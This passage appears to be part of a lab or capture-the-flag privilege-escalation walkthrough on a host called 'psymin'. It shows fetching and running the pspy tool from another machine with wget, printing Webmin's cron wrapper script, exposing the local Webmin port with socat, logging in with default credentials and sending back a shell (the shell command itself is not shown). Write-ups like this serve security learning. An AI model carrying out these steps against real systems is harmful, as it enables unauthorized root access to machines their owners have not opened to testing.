alfred@psymin:~$ cd /tmp alfred@psymin:/tmp$ wget http://192.168.10.102:8888/lpspy64 alfred@psymin:/tmp$ chmod +x lpspy64 alfred@psymin:/tmp$ ./lpspy64
pspy shows root running a particular process; let's look at it:
alfred@psymin:/tmp$ cat /usr/share/webmin/webmincron/webmincron.pl
#!/usr/bin/perl
# Wrapper to run a single function via webmin cron

$main::no_acl_check = 1;
$main::no_referers_check = 1;
$main::webmin_script_type = 'cron';
do './webmincron-lib.pl';

$cron = $ARGV[0];

# Build list of args
my @args;
for(my $i=0; defined($cron->{'arg'.$i}); $i++) {
	push(@args, $cron->{'arg'.$i});
	}

# Force webmin script type to be cron
$main::webmin_script_type = 'cron';
$main::webmin_script_webmincron = $cron->{'module'}."::".$cron->{'func'};

# Require the module, call the function
eval {
	local $main::error_must_die = 1;
	&foreign_require($cron->{'module'}, $cron->{'file'});
	&foreign_call($cron->{'module'}, $cron->{'func'}, @args);
	};
$log = { %$cron };
if ($@) {
	$log->{'error'} = $@;
	}

# Log it, if enabled
if ($gconfig{'logsched'}) {
	&webmin_log("run", "webmincron", $cron->{'id'}, $log);
	}
Dig further:
alfred@psymin:/tmp$ find / -name webmin 2>/dev/null
/etc/webmin
/etc/webmin/webmin
/etc/pam.d/webmin
/usr/bin/webmin
/usr/share/webmin
/usr/share/webmin/webmin
/usr/share/webmin/bin/webmin
/usr/share/webmin/gray-theme/webmin
/usr/share/webmin/gray-theme/images/favicons/webmin
/usr/share/webmin/authentic-theme/images/modules/webmin
/usr/share/webmin/authentic-theme/images/favicons/webmin
/usr/share/doc/webmin
/var/webmin
Weak-password login
Forward port 10000 so it is reachable from outside:
alfred@psymin:~$ socat TCP-LISTEN:10001,fork TCP4:127.0.0.1:10000&
[1] 1702
Try the default username and password:
Login succeeded; now run commands from Webmin!
Send a shell back:
Success!